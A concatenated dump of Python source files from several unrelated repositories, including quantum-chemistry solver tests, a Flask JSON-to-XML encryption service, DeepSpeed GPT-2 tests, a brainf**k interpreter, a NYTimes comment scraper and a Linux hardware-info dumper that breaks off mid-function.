of_mole.n_atoms = molecule.natm
of_mole.atoms = [row[0] for row in molecule.atom],
of_mole.protons = 0
of_mole.nuclear_repulsion = molecule.energy_nuc()
of_mole.charge = molecule.charge
of_mole.n_electrons = molecule.nelectron
of_mole.n_orbitals = len(mean_field.mo_energy)
of_mole.n_qubits = 2 * of_mole.n_orbitals
of_mole.hf_energy = mean_field.e_tot
of_mole.orbital_energies = mean_field.mo_energy
of_mole.mp2_energy = None
of_mole.cisd_energy = None
of_mole.fci_energy = None
of_mole.ccsd_energy = None
of_mole.general_calculations = {}
of_mole._canonical_orbitals = mean_field.mo_coeff
of_mole._overlap_integrals = mean_field.get_ovlp()
of_mole.h_core = mean_field.get_hcore()
of_mole._one_body_integrals = of_mole._canonical_orbitals.T @ of_mole.h_core @ of_mole._canonical_orbitals
twoint = mean_field._eri
eri = ao2mo.restore(8, twoint, of_mole.n_orbitals)
eri = ao2mo.incore.full(eri, of_mole._canonical_orbitals)
eri = ao2mo.restore(1, eri, of_mole.n_orbitals)
of_mole._two_body_integrals = np.asarray(eri.transpose(0,2,3,1), order='C')
return of_mole
```
#### File: electronic_structure_solvers/fci_solver/test_fci_solver.py
```python
import unittest
from pyscf import gto, scf
from openqemist.electronic_structure_solvers import FCISolver
H2 = """
H 0.00 0.00 0.0
H 0.00 0.00 0.74137727
"""
Be = """Be 0.0 0.0 0.0"""
class FCISolverTest(unittest.TestCase):
def test_h2_no_mf(self):
""" Test the FCISolver against result from reference implementation with
mean field not calculated."""
mol = gto.Mole()
mol.atom = H2
mol.basis = "3-21g"
mol.charge = 0
mol.spin = 0
mol.build()
solver = FCISolver()
energy = solver.simulate(mol)
self.assertAlmostEqual(energy, -1.1478300596229851, places=8)
#TODO: test RDM here
def test_h2_with_mf(self):
""" Test the FCISolver against result from reference implementation with
mean field calculated and passed in."""
mol = gto.Mole()
mol.atom = H2
mol.basis = "3-21g"
mol.charge = 0
mol.spin = 0
mol.build()
mf = scf.RHF(mol)
mf.verbose = 0
mf.scf()
solver = FCISolver()
energy = solver.simulate(mol, mf)
self.assertAlmostEqual(energy, -1.1478300596229851, places=8)
#TODO: test RDM here
def test_be_no_mf(self):
""" Test the FCISolver against result from reference implementation with
mean field not calculated."""
mol = gto.Mole()
mol.atom = Be
mol.basis = "3-21g"
mol.charge = 0
mol.spin = 0
mol.build()
solver = FCISolver()
energy = solver.simulate(mol)
self.assertAlmostEqual(energy, -14.531444379108095, places=8)
#TODO: test RDM here
def test_be_with_mf(self):
""" Test the FCISolver against result from reference implementation with
mean field calculated and passed in."""
mol = gto.Mole()
mol.atom = Be
mol.basis = "3-21g"
mol.charge = 0
mol.spin = 0
mol.build()
mf = scf.RHF(mol)
mf.verbose = 0
mf.scf()
solver = FCISolver()
energy = solver.simulate(mol, mf)
self.assertAlmostEqual(energy, -14.531444379108095, places=8)
#TODO: test RDM here
def test_get_rdm_without_simulate(self):
"""Test that the runtime error is raised when user calls get RDM without
first running a simulation."""
solver = FCISolver()
self.assertRaises(RuntimeError, solver.get_rdm);
if __name__ == "__main__":
unittest.main()
```
#### File: electronic_structure_solvers/vqe_solver/test_vqe_solver_qiskit.py
```python
import unittest
from pyscf import gto, scf
from openqemist.electronic_structure_solvers import VQESolver, FCISolver
from openqemist.quantum_solvers import QiskitParametricSolver
H2 = [['H', [0.0, 0.0, 0.0]], ['H', [0.0, 0.0, 0.74137727]]]
H4 = [['H', [0.7071067811865476, 0.0, 0.0]],
['H', [0.0, 0.7071067811865476, 0.0]],
['H', [-1.0071067811865476, 0.0, 0.0]],
['H', [0.0, -1.0071067811865476, 0.0]]]
class VQESolverTest(unittest.TestCase):
def test_h2_sto3g(self):
""" Test the converged energy of VQE with no initial variational parameters
provided by the user """
mol = gto.Mole()
mol.atom = H2
mol.basis = "sto-3g"
mol.charge = 0
mol.spin = 0
mol.build()
solver = VQESolver()
solver.hardware_backend_type = QiskitParametricSolver
solver.ansatz_type = QiskitParametricSolver.Ansatze.UCCSD
energy = solver.simulate(mol)
self.assertAlmostEqual(energy, -1.1372704178510415, delta=1e-3)
@unittest.skip("Pending faster implementation of get_rdm.")
def test_h2_321g(self):
""" Test the converged energy of VQE with initial variational parameters
provided by the user """
mol = gto.Mole()
mol.atom = H2
mol.basis = "3-21g"
mol.charge = 0
mol.spin = 0
mol.build()
solver = VQESolver()
solver.hardware_backend_type = QiskitParametricSolver
solver.ansatz_type = QiskitParametricSolver.Ansatze.UCCSD
solver.initial_var_params = [-0.01039529, -0.04685435, -0.01858744, -0.01118045, -0.04674074,
-0.01848484, -0.12702138, -0.0222594, 0.04799664, -0.02237422,
-0.04972733, 0.01266251, 0.04764409, 0.01265669, -0.06169727]
energy = solver.simulate(mol)
self.assertAlmostEqual(energy, -1.1478300615818977, delta=1e-3)
@unittest.skip("Pending faster implementation of get_rdm.")
def test_h4_sto3g(self):
""" Test the converged energy of VQE with initial variational parameters provided by the user """
mol = gto.Mole()
mol.atom = H4
mol.basis = "sto3g"
mol.charge = 0
mol.spin = 0
mol.build()
solver = VQESolver()
solver.hardware_backend_type = QiskitParametricSolver
solver.ansatz_type = QiskitParametricSolver.Ansatze.UCCSD
energy = solver.simulate(mol)
self.assertAlmostEqual(energy, -1.97784, delta=1e-3)
if __name__ == "__main__":
unittest.main()
```
#### File: problem_decomposition/dmet/test_dmet_fragment.py
```python
import unittest
from pyscf import gto
from openqemist.problem_decomposition.dmet._helpers.dmet_fragment import dmet_fragment_constructor
class TestFragments(unittest.TestCase):
""" Generate the orbital list """
def test_orbital_list_construction(self):
# Initialize Molecule object with PySCF and input
mol = gto.Mole()
mol.atom = """
C 0.94764 -0.02227 0.05901
H 0.58322 0.35937 -0.89984
H 0.54862 0.61702 0.85300
H 0.54780 -1.03196 0.19694
C 2.46782 -0.03097 0.07887
H 2.83564 0.98716 -0.09384
H 2.83464 -0.65291 -0.74596
C 3.00694 -0.55965 1.40773
H 2.63295 -1.57673 1.57731
H 2.63329 0.06314 2.22967
C 4.53625 -0.56666 1.42449
H 4.91031 0.45032 1.25453
H 4.90978 -1.19011 0.60302
C 5.07544 -1.09527 2.75473
H 4.70164 -2.11240 2.92450
H 4.70170 -0.47206 3.57629
C 6.60476 -1.10212 2.77147
H 6.97868 -0.08532 2.60009
H 6.97839 -1.72629 1.95057
C 7.14410 -1.62861 4.10112
H 6.77776 -2.64712 4.27473
H 6.77598 -1.00636 4.92513
C 8.66428 -1.63508 4.12154
H 9.06449 -2.27473 3.32841
H 9.02896 -2.01514 5.08095
H 9.06273 -0.62500 3.98256"""
mol.basis = "3-21g"
mol.charge = 0
mol.spin = 0
mol.build()
# Determine the number of atoms for each fragment
fragment_atom = [4,3,3,3,3,3,3,4]
# Test the construction of orbitals lists
orb_list, orb_list2, atom_list2 = dmet_fragment_constructor(mol, fragment_atom, 1)
self.assertEqual(atom_list2, [7, 6, 6, 7], "The orbital list (number per fragment) does not agree")
self.assertEqual(orb_list, [28,26,26,28], "The orbital list (number per fragment) does not agree")
self.assertEqual(orb_list2, [[0,28],[28,54],[54,80],[80,108]], "The min max list does not agree")
if __name__ == "__main__":
unittest.main()
```
#### File: problem_decomposition/dmet/test_dmet_orbitals.py
```python
import unittest
from openqemist.problem_decomposition.dmet._helpers.dmet_orbitals import dmet_orbitals
from openqemist.problem_decomposition.electron_localization import iao_localization
from pyscf import gto, scf
import numpy as np
def get_file_path_stub():
""" Gets the path of the test files from anywhere in the test tree."
The direcory structure should be $SOMETHING/openqemist/openqemist/tests/$SOMETHINGELSE
so we trim after "tests", then add the path to the results files so we can
run the tests from anywhere in the tree."""
import os
cwd = os.getcwd()
tests_root = cwd[0:cwd.find("tests") + 5]
return tests_root + "/problem_decomposition/dmet/"
class TestDMETorbitals(unittest.TestCase):
""" Generate the localized orbitals employing IAOs """
def test_orbital_construction(self):
# Initialize Molecule object with PySCF and input
mol = gto.Mole()
mol.atom = """
C 0.94764 -0.02227 0.05901
H 0.58322 0.35937 -0.89984
H 0.54862 0.61702 0.85300
H 0.54780 -1.03196 0.19694
C 2.46782 -0.03097 0.07887
H 2.83564 0.98716 -0.09384
H 2.83464 -0.65291 -0.74596
C 3.00694 -0.55965 1.40773
H 2.63295 -1.57673 1.57731
H 2.63329 0.06314 2.22967
C 4.53625 -0.56666 1.42449
H 4.91031 0.45032 1.25453
H 4.90978 -1.19011 0.60302
C 5.07544 -1.09527 2.75473
H 4.70164 -2.11240 2.92450
H 4.70170 -0.47206 3.57629
C 6.60476 -1.10212 2.77147
H 6.97868 -0.08532 2.60009
H 6.97839 -1.72629 1.95057
C 7.14410 -1.62861 4.10112
H 6.77776 -2.64712 4.27473
H 6.77598 -1.00636 4.92513
C 8.66428 -1.63508 4.12154
H 9.06449 -2.27473 3.32841
H 9.02896 -2.01514 5.08095
H 9.06273 -0.62500 3.98256"""
mol.basis = "3-21g"
mol.charge = 0
mol.spin = 0
mol.build(verbose=0)
mf = scf.RHF(mol)
mf.scf()
dmet_orbs = dmet_orbitals(mol, mf, range(mol.nao_nr()), iao_localization)
dmet_orbitals_ref = np.loadtxt(get_file_path_stub() + 'test_dmet_orbitals.txt')
# Test the construction of IAOs
for index, value_ref in np.ndenumerate(dmet_orbitals_ref):
self.assertAlmostEqual(value_ref, dmet_orbs.localized_mo[index], msg='DMET orbs error at index ' + str(index), delta=1e-6)
if __name__ == "__main__":
unittest.main()
```
#### File: quantum_solvers/microsoft_qsharp/test_microsoft_qsharp_parametric_solver.py
```python
import unittest
import numpy as np
from pyscf import gto, scf, mp
from openqemist.quantum_solvers import MicrosoftQSharpParametricSolver
def get_file_path_stub():
""" Gets the path of the test files from anywhere in the test tree."
The direcory structure should be $SOMETHING/QEMIST/qemist/tests/$SOMETHINGELSE
so we trim after "tests", then add the path to the results files so we can
run the tests from anywhere in the tree."""
import os
cwd = os.getcwd()
tests_root = cwd[0:cwd.find("tests") + 5]
return tests_root + "/quantum_solvers/microsoft_qsharp/data/"
def matricize_2rdm(two_rdm, n_electrons, n_orbitals):
""" Turns the two_rdm tensor into a matrix for test purposes """
l = 0
sq = n_orbitals*n_orbitals
jpqrs = np.zeros((n_orbitals,n_orbitals),dtype=np.int)
for i in range(n_orbitals):
for j in range(n_orbitals):
jpqrs[i,j] = l
l += 1
rho = np.zeros((sq,sq))
for i in range(n_orbitals):
for j in range(n_orbitals):
ij = jpqrs[i,j]
for k in range(n_orbitals):
for l in range(n_orbitals):
kl = jpqrs[k,l]
rho[ij,kl] += two_rdm[i,k,j,l]
return rho
H2 = """
H 0.00 0.00 0.0
H 0.00 0.00 0.74137727
"""
H4 = """
H 0.7071067811865476 0.0 0.0
H 0.0 0.7071067811865476 0.0
H -1.0071067811865476 0.0 0.0
H 0.0 -1.0071067811865476 0.0
"""
LiH = """
H 0.00 0.00 0.0
Li 0.00 0.00 1.0
"""
# References for H2
amplitudes_H2 = [1.69971474e-05, 5.65855806e-02]
# References for H4
amplitudes_H4 = [-3.00520142e-05, -3.41547577e-05, 7.61837556e-06 ,-2.24075399e-05,
1.12512690e-02, 3.42703399e-01, 3.44523818e-02, 1.46586868e-02,
7.69034155e-02, 7.99964875e-03, -1.81430817e-01, -1.06611015e-01,
1.12938142e-02, -3.75164050e-02]
# References for LiH
amplitudes_LiH = [-4.17776465e-04, -3.01636877e-02, 2.59247846e-06, -1.81380838e-06,
2.56473288e-06, -1.67351123e-06, 4.99995120e-04, 4.87411549e-04,
1.67454873e-03, 1.12528808e-02, 8.90183149e-04, 1.82504586e-02,
8.40833525e-04, 1.82672779e-02, 3.93722603e-04, 4.83775296e-02,
4.99457737e-04, -1.34326076e-18, -3.13927118e-08, -7.69532977e-09,
-7.69532977e-09, 1.61799005e-03, -4.24862234e-03, -7.69532977e-09,
-3.13927118e-08, -1.07614392e-07, -3.13927118e-08, -1.49223410e-03,
-4.35798373e-02, 2.98149476e-03, -3.13927118e-08, -2.66454784e-08,
-7.69532977e-09, -7.69532977e-09, -5.64104758e-08, -7.69532977e-09,
-1.15815072e-08, -7.69532977e-09, 2.98287967e-03, -3.13927118e-08,
-3.13927118e-08, -3.13927118e-08, -1.07614392e-07, 2.94725869e-03]
class MicrosoftQSharpParametricSolverTest(unittest.TestCase):
def test_no_mf_H2(self):
""" Tests number of amplitudes as well as simulate and get_RDM methods """
mol = gto.Mole()
mol.atom = H2
mol.basis = "sto-3g"
mol.charge = 0
mol.spin = 0
mol.build()
ansatz = MicrosoftQSharpParametricSolver.Ansatze.UCCSD
solver = MicrosoftQSharpParametricSolver(ansatz, mol)
# Test that the number of variational parameters is as expected
self.assertEqual(solver.amplitude_dimension, 2)
# Test "simulate"
energy = solver.simulate(amplitudes_H2)
self.assertAlmostEqual(energy, -1.13727, delta=1e-5)
# Compute RDM matrices
one_rdm, two_rdm = solver.get_rdm()
# Test traces of matrices
n_elec, n_orb = mol.nelectron, mol.nao_nr()
rho = matricize_2rdm(two_rdm, n_elec, n_orb)
self.assertAlmostEqual(np.trace(one_rdm), n_elec, msg='Trace of one_rdm does not match number of electrons', delta=1e-6)
self.assertAlmostEqual(np.trace(rho), n_elec*(n_elec-1), msg='Trace of two_rdm does not match n_elec * (n_elec-1)', delta=1e-6)
def test_no_mf_H4(self):
""" Tests number of amplitudes as well as simulate and get_RDM methods """
mol = gto.Mole()
mol.atom = H4
mol.basis = "sto-3g"
mol.charge = 0
mol.spin = 0
mol.build()
# Initialize mean field object with PySCF
mf = scf.RHF(mol)
mf.verbose = 0
mf.scf()
twoint = mf._eri
oneint = mf.get_hcore()
fock = mf.get_fock()
ansatz = MicrosoftQSharpParametricSolver.Ansatze.UCCSD
solver = MicrosoftQSharpParametricSolver(ansatz, mol)
# Test that the number of variational parameters is as expected
self.assertEqual(solver.amplitude_dimension, 14)
# Test "simulate"
energy = solver.simulate(amplitudes_H4)
# Compute RDM matrices
one_rdm, two_rdm = solver.get_rdm()
# Test traces of matrices
n_elec, n_orb = mol.nelectron, mol.nao_nr()
rho = matricize_2rdm(two_rdm, n_elec, n_orb)
self.assertAlmostEqual(np.trace(one_rdm), n_elec, msg='Trace of one_rdm does not match number of electrons', delta=1e-6)
self.assertAlmostEqual(np.trace(rho), n_elec*(n_elec-1), msg='Trace of two_rdm does not match n_elec * (n_elec-1)', delta=1e-6)
def test_no_mf_LiH(self):
""" Tests get_RDM methods: assume energy is correct and reconstruct from RDM """
mol = gto.Mole()
mol.atom = LiH
mol.basis = "sto-3g"
mol.charge = 0
mol.spin = 0
mol.build()
# Initialize mean field object with PySCF
mf = scf.RHF(mol)
mf.verbose = 0
mf.scf()
twoint = mf._eri
oneint = mf.get_hcore()
fock = mf.get_fock()
ansatz = MicrosoftQSharpParametricSolver.Ansatze.UCCSD
solver = MicrosoftQSharpParametricSolver(ansatz, mol)
# Test that the number of variational parameters is as expected
self.assertEqual(solver.amplitude_dimension, 44)
# Test "simulate"
energy = solver.simulate(amplitudes_LiH)
# Compute RDM matrices
one_rdm, two_rdm = solver.get_rdm()
# Test traces of matrices
n_elec, n_orb = mol.nelectron, mol.nao_nr()
rho = matricize_2rdm(two_rdm, n_elec, n_orb)
self.assertAlmostEqual(np.trace(one_rdm), n_elec, msg='Trace of one_rdm does not match number of electrons', delta=1e-6)
self.assertAlmostEqual(np.trace(rho), n_elec*(n_elec-1), msg='Trace of two_rdm does not match n_elec * (n_elec-1)', delta=1e-6)
def test_mf_H2(self):
"""Tests that all the values are set correctly in the constructor."""
mol = gto.Mole()
mol.atom = H2
mol.basis = "sto-3g"
mol.charge = 0
mol.spin = 0
mol.build()
mean_field = scf.RHF(mol)
mean_field.verbose = 0
mean_field.scf()
ansatz = MicrosoftQSharpParametricSolver.Ansatze.UCCSD
solver = MicrosoftQSharpParametricSolver(ansatz, mol, mean_field)
self.assertEqual(solver.amplitude_dimension, 2)
energy = solver.simulate(amplitudes_H2)
self.assertAlmostEqual(energy, -1.13727, delta=1e-5)
def test_simulate_dimension_throw(self):
"""Tests that all the values are set correctly in the constructor."""
mol = gto.Mole()
mol.atom = H2
mol.basis = "sto-3g"
mol.charge = 0
mol.spin = 0
mol.build()
mean_field = scf.RHF(mol)
mean_field.verbose = 0
mean_field.scf()
ansatz = MicrosoftQSharpParametricSolver.Ansatze.UCCSD
solver = MicrosoftQSharpParametricSolver(ansatz, mol, mean_field)
# solver.amplitude_dimension = 2, this should throw.
self.assertRaises(ValueError, solver.simulate, [0])
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "1r0npipe/python-json-xml-converter-encypted",
"score": 3
} |
#### File: python-json-xml-converter-encypted/cont_a/cont_a.py
```python
import os
import json
from json2xml import json2xml
from json2xml.utils import readfromstring
from cryptography.fernet import Fernet
import flask
from flask import request, jsonify
xml_content = dict()
xml_content_arr = []
count_files = 0
if __name__ == "__main__":
web_app = flask.Flask(__name__)
web_app.config['DEBUG'] = True
key = os.getenv('KEY_ENCRYPT')
key = Fernet.generate_key()
with open("/shared/secret.key", "wb") as key_file:
key_file.write(key)
try:
# reading the content of file
json_files = open('json_list.txt', 'r')
fernet = Fernet(key)
for file_json in json_files.readlines():
if not file_json.startswith("#"):
try:
opened_json = open(file_json.strip())
json_out = str(json.load(opened_json)).replace('\'', '\"')
data = readfromstring(json_out)
xml_out = json2xml.Json2xml(data, wrapper="all", pretty=True, attr_type=False).to_xml()
xml_out_encode = xml_out.encode()
xml_encrypted = fernet.encrypt(xml_out_encode)
xml_content['id'] = str(count_files)
xml_content['file'] = str(xml_encrypted)
xml_content['filename'] = file_json.strip().replace('json','xml')
xml_content_arr.append(xml_content.copy())
count_files = count_files + 1
except:
print("File - " + file_json + " cannot be opened")
exit()
finally:
#xml_file.close()
opened_json.close()
except:
print("The list or JSON file cannot be opened or something goes worng, please check the file format/permissions")
exit()
finally:
json_files.close()
@web_app.route('/files', methods=['GET'])
def file_id():
json_output = xml_content_arr
return jsonify(json_output)
web_app.run(host='0.0.0.0')
``` |
{
"source": "1rahul1/DeepSpeed",
"score": 2
} |
#### File: model/Megatron_GPT2/run_func_test.py
```python
import unittest
import subprocess
import os
import time
import re
from .test_common import BaseTestCase
def grep_loss_from_file(file_name):
loss = 0.0
with open(file_name, 'r') as f:
lines = f.readlines()
line_filter = "validation loss at the end of training for test data | LM loss:"
match_number = re.compile('LM loss: ([-+]?[0-9]+\.?[0-9]*(?:[Ee][-+]?[0-9]+)?)')
for line in lines:
if line_filter in line:
loss = re.findall(match_number, line)
loss = float(loss[0])
if loss == 0.0:
print("no loss found in file ", file_name)
return loss
class GPT2FuncTestCase(BaseTestCase):
def __init__(self, methodName="DeepSpeed function test on GPT2 model"):
super(GPT2FuncTestCase, self).__init__(methodName)
def setUp(self):
self.save_dir = os.getcwd()
new_dir = os.path.dirname(__file__)
if new_dir:
os.chdir(new_dir)
def tearDown(self):
os.chdir(self.save_dir)
def test_mp1_gpu1_node1(self):
test_config = {
"mp": 1,
"gpus": 1,
"nodes": 1,
"bs": 4,
"steps": 1000,
"layers": 12,
"hidden_size": 768,
"seq_length": 256,
"heads": 12,
"deepspeed": False,
"json": "ds_config_func_bs4.json",
}
succ = self.run_test(test_config, 0.01)
self.assertTrue(succ)
def test_mp1_gpu2_node1(self):
test_config = {
"mp": 1,
"gpus": 2,
"nodes": 1,
"bs": 8,
"steps": 1000,
"layers": 12,
"hidden_size": 768,
"seq_length": 256,
"heads": 12,
"deepspeed": False,
"json": "ds_config_func_bs8.json",
}
succ = self.run_test(test_config, 0.01)
self.assertTrue(succ)
def test_mp2_gpu4_node1(self):
test_config = {
"mp": 2,
"gpus": 4,
"nodes": 1,
"bs": 8,
"steps": 1000,
"layers": 12,
"hidden_size": 768,
"seq_length": 256,
"heads": 12,
"deepspeed": False,
"json": "ds_config_func_bs8.json",
}
succ = self.run_test(test_config, 0.01)
self.assertTrue(succ)
succ = self.run_partition_activations_test(test_config, 0.01)
self.assertTrue(succ)
def test_mp4_gpu4_node1(self):
test_config = {
"mp": 4,
"gpus": 4,
"nodes": 1,
"bs": 8,
"steps": 1000,
"layers": 12,
"hidden_size": 768,
"seq_length": 256,
"heads": 12,
"deepspeed": False,
"json": "ds_config_func_bs8.json",
}
succ = self.run_test(test_config, 0.01)
self.assertTrue(succ)
succ = self.run_partition_activations_test(test_config, 0.01)
self.assertTrue(succ)
def test_optimizer_scheduler(self):
test_config = {
"mp": 1,
"gpus": 1,
"nodes": 1,
"bs": 4,
"steps": 20,
"layers": 12,
"hidden_size": 768,
"seq_length": 256,
"heads": 12,
"deepspeed": False,
"json": "ds_config_func_scheduler.json",
}
succ = self.run_test(test_config, 0.01)
# assure no crash.
self.assertTrue(True)
def run_partition_activations_test(self, test_config, r_tol):
print("\n")
print("{0}: starting......".format(self.id()))
prefix = "gpt2_partition_activation_"
# baseline run...
test_config["deepspeed"] = False
base_file = self.gen_output_name(test_config, prefix)
# skip baseline run if it exists.
if not self.has_loss_data(base_file):
print("{0}: baseline run.".format(self.id()))
self.run_gpt2_test(test_config, base_file)
else:
print("{0}: baseline exists.".format(self.id()))
# DeepSpeed run...
test_config["deepspeed"] = True
test_config["other_args"] = "--partition-activations"
print("{0}: DeepSpeed run.".format(self.id()))
test_file = self.gen_output_name(test_config, prefix)
self.run_gpt2_test(test_config, test_file)
return self.check_parity(base_file, test_file, r_tol)
def run_test(self, test_config, r_tol):
print("\n")
print("{0}: starting......".format(self.id()))
prefix = "gpt2_func"
# baseline run...
test_config["deepspeed"] = False
base_file = self.gen_output_name(test_config, prefix)
# skip baseline run if it exists.
if not self.has_loss_data(base_file):
print("{0}: baseline run.".format(self.id()))
self.run_gpt2_test(test_config, base_file)
else:
print("{0}: baseline exists.".format(self.id()))
# DeepSpeed run...
test_config["deepspeed"] = True
print("{0}: DeepSpeed run.".format(self.id()))
test_file = self.gen_output_name(test_config, prefix)
self.run_gpt2_test(test_config, test_file)
return self.check_parity(base_file, test_file, r_tol)
def has_loss_data(self, file_name):
has_loss = False
if os.path.exists(file_name):
loss = grep_loss_from_file(file_name)
if loss != 0.0:
has_loss = True
return has_loss
def check_parity(self, base_file, test_file, r_tol):
base_loss = grep_loss_from_file(base_file)
test_loss = grep_loss_from_file(test_file)
print("baseline loss: {0}, test loss: {1}".format(base_loss, test_loss))
if base_loss == 0.0 or test_loss == 0.0:
return False
if abs((base_loss - test_loss) / base_loss) > r_tol:
return False
return True
def suite():
suite = unittest.TestSuite()
suite.addTest(GPT2FuncTestCase('test_mp1_gpu1_node1'))
suite.addTest(GPT2FuncTestCase('test_mp1_gpu2_node1'))
suite.addTest(GPT2FuncTestCase('test_mp2_gpu4_node1'))
suite.addTest(GPT2FuncTestCase('test_mp4_gpu4_node1'))
suite.addTest(GPT2FuncTestCase('test_optimizer_scheduler'))
return suite
if __name__ == '__main__':
runner = unittest.TextTestRunner(failfast=True)
runner.run(suite())
``` |
{
"source": "1ramen/bfython",
"score": 3
} |
#### File: bfython/src/bfython.py
```python
import core
from IO.args import argparser
def main():
"""Load and execute a brainf**k source file"""
# parse the command line arguments
args = argparser.parse_args()
# generate tokens from a file
tokens = core.parser.lex(args.file, args.comment)
# execute the code and generate a resulting tape
tape = core.parser.parse(tokens, args.length, args.size, args.wrapping, args.endofloop)
# dump the tape to a file
if args.dumpfile is not None:
core.parser.dump(args.dumpfile, tape)
if __name__ == "__main__":
main()
```
#### File: src/core/parser.py
```python
import core.environment
def lex(file: str, comment: str) -> list:
"""Parse source file"""
source = open(file)
tokens = []
for line in source:
for ch in line:
if ch == comment:
break
tokens += ch
return tokens
def parse(tokens: list, length: int, size: int, wrapping: bool, end_of_loop: int) -> core.environment.Tape:
env = core.environment.Environment(length, size, wrapping, end_of_loop)
env.parse(tokens)
return env.tape
def dump(file: str, tape: core.environment.Tape):
dump_file = open(file, 'w')
dump_file.write(str(tape))
``` |
{
"source": "1ramen/physiics",
"score": 4
} |
#### File: physiics/src/tools.py
```python
import math
from engineio import *
class Vector:
"""XY pair for calculating motion"""
def __init__(self, x=0, y=None):
if y is None:
y = x
self.x = int(x)
self.y = int(y)
def length(self):
"""Return vector length"""
# use pythagorean theorem to calculate the overall length
return math.sqrt(self.x ** 2 + self.y ** 2)
def zero(self):
"""Clear the Vector"""
# set the vector to a default value and return it
self = Vector()
return self
def __str__(self):
return "({}, {})".format(self.x, self.y)
def __add__(self, other):
return Vector(self.x + other.x, self.y + other.y)
def __sub__(self, other):
return Vector(self.x - other.x, self.y - other.y)
def __mul__(self, other):
try:
return Vector(self.x * other.x, self.y * other.y)
except:
return Vector(self.x * other, self.y * other)
def __truediv__(self, other):
return Vector(self.x / other.x, self.y / other.y)
def __floordiv__(self, other):
return Vector(self.x // other.x, self.y // other.y)
def __iadd__(self, other):
self = self + other
def __isub__(self, other):
self = self - other
def __neg__(self):
return Vector(-self.x, -self.y)
def __invert__(self):
return Vector(self.y, self.x)
class Item:
"""Object in space"""
def __init__(self, velocity=Vector(), mass=0, symbol=' '):
self.velocity = velocity
self.mass = mass
self.symbol = symbol
self.moved = False
def __str__(self):
return "<{}, {}, '{}'>".format(self.velocity.__str__(), self.mass, self.symbol)
def momentum(self) -> int:
"""Calculate the momentum of the item"""
return self.velocity.length() * self.mass
def accelerate(self, acceleration: Vector) -> Vector:
"""Accelerate the object by a given ammount"""
# if there is no second term assume that the first applies to both
if acceleration.y is None:
acceleration.y = acceleration.x
# update the velocity ensuring that if it is decelerating, it doesn't go below zero
if self.velocity.x > 0:
self.velocity.x = max(self.velocity.x + acceleration.x, 0)
elif self.velocity.x < 0:
self.velocity.x = min(self.velocity.x - acceleration.x, 0)
if self.velocity.y > 0:
self.velocity.y = max(self.velocity.y + acceleration.y, 0)
elif self.velocity.y < 0:
self.velocity.y = min(self.velocity.y - acceleration.y, 0)
# return the updated velocity
return self.velocity
def gravity(self, gravity: int) -> None:
"""Apply given gravitaional constant to Item"""
if self.mass != 0:
self.velocity.y += gravity
def move(self, pos: Vector) -> Vector:
"""Calculate the new position of a point using the given Item's velocity"""
#print("{} + {} = {}".format(pos, self.velocity, pos + self.velocity))
return pos + self.velocity
``` |
{
"source": "1rara/BGMTagViewer",
"score": 3
} |
#### File: BGMTagViewer/py/subjectCrawler.py
```python
import scrapy
import json
import random
import sys
from scrapy.crawler import CrawlerProcess
class Spider(scrapy.Spider):
name='bgmSubjectSpider'
start_urls = []
years = []
data = {}
for i in json.load(open('./data/scrapeIndex.json')):
data.update(i)
print(len(data))
for i in data:
if data[i] and i != '':
start_urls.append(
'https://api.bgm.tv/v0/subjects/'+i)
else:
print('year not exist:', i)
#start_urls = random.sample(start_urls, 20)
def parse(self, response):
res = json.loads(response.text)
res['year'] = self.data[str(res['id'])]
res.pop('summary', None)
res.pop('images', None)
yield res
process = CrawlerProcess(settings={
'FEEDS': {
'./data/subject.json': {
'format': 'json',
'overwrite': True,
},
},
'FEED_EXPORT_ENCODING': 'utf-8',
'DEFAULT_REQUEST_HEADERS': {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en',
'Authorization': 'Bearer '+sys.argv[1],
},
'ROBOTSTXT_OBEY': False,
'LOG_FILE': 'log.txt',
'LOG_LEVEL': 'INFO',
})
process.crawl(Spider)
process.start()
``` |
{
"source": "1Reinier/CapstoneThesis",
"score": 2
} |
#### File: 1Reinier/CapstoneThesis/test.py
```python
from main import *
def main():
simulation = Controller()
simulation.test() # prints banks' asset size, to export for statistical analysis | PASSED
# for bank in simulation.banks:
# bank.test() # prints bank_id and degree | PASSED
pass
if __name__ == "__main__":
# test settings
main()
```
#### File: 1Reinier/CapstoneThesis/UI.py
```python
class Interface(object):
"""
Creates visual representation of the data.
"""
def __init___(self):
pass
def plot(self, xlist, ylist):
"""
Plots data from xlist and ylist.
"""
pass
#
#
#
# TO DO IN FUTURE RESEARCH
#
#
#
#
``` |
{
"source": "1Reinier/NYTimes-Comment-Popularity-Prediction",
"score": 3
} |
#### File: 1Reinier/NYTimes-Comment-Popularity-Prediction/scrape.py
```python
import requests, time, simplejson, sys
from datetime import date, datetime, timedelta
def perdelta(start, end, delta):
curr = start
while curr < end:
yield curr
curr += delta
# Scrape 300 comments per day from Nov. 1, 2014 to Oct. 31, 2015
for da in perdelta(date(2015, 2, 21), date(2015, 11, 1), timedelta(days=1)):
comments = []
print da
skip = False
gotany = True
for i in range(12): # collect 25*12=300 comments
if not skip:
success = False
count = 0
url = ('http://api.nytimes.com/svc/community/v3/user-content/' +
'by-date.json?api-key=KEY&date=' + str(da) +
'&offset=' + str(25*i))
while not success:
comments_data = requests.get(url)
try:
data = simplejson.loads(comments_data.content)
success = True # go to the next offset
for d in data['results']['comments']:
comments.append(d)
time.sleep(2)
except:
print 'error on {}'.format(str(da))
print url
count += 1
if count > 3:
success = True # not really
skip = True # just skip to the next day
if i == 0:
gotany = False # if we didn't get any comments from that day
time.sleep(2)
if gotany:
filestr = 'comments {}.json'.format(str(da))
with open(filestr, 'w') as f:
simplejson.dump(comments, f)
# Short script to combine all the JSON lists into one
allcomments = []
for d in perdelta(date(2014, 1, 1), date(2015, 12, 31), timedelta(days=1)):
try:
with open('comments {}.json'.format(str(d))) as f:
c = simplejson.load(f)
allcomments.extend(c)
except:
pass
``` |
{
"source": "1Revenger1/OCSysInfo",
"score": 3
} |
#### File: dumps/Linux/linux.py
```python
import os
import re
from error.cpu_err import cpu_err
from managers.devicemanager import DeviceManager
class LinuxHardwareManager:
"""
Instance, implementing `DeviceManager`, for extracting system information
from Linux using the `sysfs` pseudo file system.
https://www.kernel.org/doc/html/latest/admin-guide/sysfs-rules.html
"""
def __init__(self, parent: DeviceManager):
self.info = parent.info
self.pci = parent.pci
self.intel = parent.intel
def dump(self):
self.cpu_info()
self.mobo_info()
self.gpu_info()
self.net_info()
self.audio_info()
self.input_info()
def cpu_info(self):
